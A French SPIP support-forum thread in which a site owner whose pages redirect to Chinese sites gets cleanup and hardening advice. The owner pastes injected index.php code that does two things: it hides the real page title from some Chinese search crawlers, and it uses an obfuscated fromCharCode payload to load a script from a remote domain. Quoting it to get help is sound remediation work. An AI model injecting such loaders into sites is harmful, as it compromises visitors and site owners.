[Résolu] site piraté ou sous phishing comment sauver sa plateforme?

Yves2110 · Août 13, 2024, 9:11

Bonjour, j’ai conçu une plateforme et depuis que je l’ais mis en ligne (déjà il faut noté qu’une fois en ligne j’ai eu du mal avec la restauration de ma base donc j’ai dû transporter tout mon dossier config avec base pour que le projet marche),mais je rencontre des soucis

Prémièrement je remarque que mon site revient a une version inachevé sans vraiment prendre mon squelette en compte

Deuxièmement quand j’essaie d’envoyé le lien a une autre personne , le content est du chinois et le problème est que lorsque l’on clique deçu sa nous ramène vers un site chinois, j’ai beau faire la réinstallation ou même le changement des fichiers mais après j’ai toujours le même probleme après 2/3 jours.

je demande vraiment de l’aide pour pouvoir resoudre mon problème car je ne sais pas si le problème c’est sur mon serveur ou dans mon code

RealET · Août 13, 2024, 9:35

Bonjour,

URL du site ?
Version de SPIP ?

Est-ce que le fichier .htaccess contient une redirection inappropriée ?
Ou index.php modifié (hacké) ?

Yves2110 · Août 13, 2024, 9:46

Salut, comment vas tu? merci pour la reponse, j’etais avant a spip 4.2.8 et tu m’avais conseillé de passer a 4.2.14, mais même après ça j’ai toujours le problème que j’ai cité aujourd’hui, https://pdu-ue-mali-mauritanie.org

RealET · Août 13, 2024, 9:54

Pour les images qui manquent, ça sent les droits apache sur les fichiers sur le serveur.

Yves2110 · Août 13, 2024, 9:59

apparemment il y’avait un script dans mon fichier index y’avait ça:

<script>
  if(!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)){
    document.title ="Accueil | Pdu-ue-mali-mauritanie.org"
  }
</script>

et ça:

<script type="text/javascript"> 
  var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,111,106,98,107,106,115,46,118,105,112,47,121,98,46,106,115,34,62,60,47,115,99,114,105,112,116,62); 
  document.write(xt);
</script>

Yves2110 · Août 13, 2024, 10:01

maintenant ma question sa sera comment me protèger de cet type d’attaque?

RealET · Août 13, 2024, 10:11

Il va falloir précéder à un nettoyage en profondeur.

En gros :

Déplacer tout dans un sous dossier
Réinstaller SPIP avec spip_loader.php
Réinstaller 1 par 1 les plugins via la gestion des plugins de SPIP (SVP)
Remettre le dossier IMG après avoir vérifié qu’il n’y avait aucun fichier « bizarre »
Remettre le dossier squelettes après avoir vérifié qu’il n’y avait aucun fichier « bizarre » ou modifié

Voir aussi : Alerte : vague de piratage de sites depuis le 23 avril 2023 : pas d’accès à /ecrire (version SPIP inférieures à 3.2.18, 4.1.8 et 4.2.1)

Et aussi changer le mot de passe FTP et MySQL.

Et vérifier le contenu de la base MySQL (rechercher des appels de scripts JS)

Yves2110 · Août 13, 2024, 10:23

ok je vais le faire tout de suite, merci Beaucoup, j’espère m’en sortir avec ça
merci

RealET · Août 13, 2024, 12:30

J’ai l’impression que ça va beaucoup mieux que tout à l’heure. Bravo !

Yves2110 · Août 13, 2024, 3:31

oui effectivemennt, avec votre aide et celle d’un ami, j’ai pu faire des corrections et j’espère que ça va tenir
encore merci pour le soutien

Jack31 · Août 13, 2024, 6:29

Si tu as bien suivi la démarche proposée par @RealET notamment les points 4 et 5, et que tu maintiens ton SPIP à jour il ne devrait pas y avoir de souci. Je passe le sujet en résolu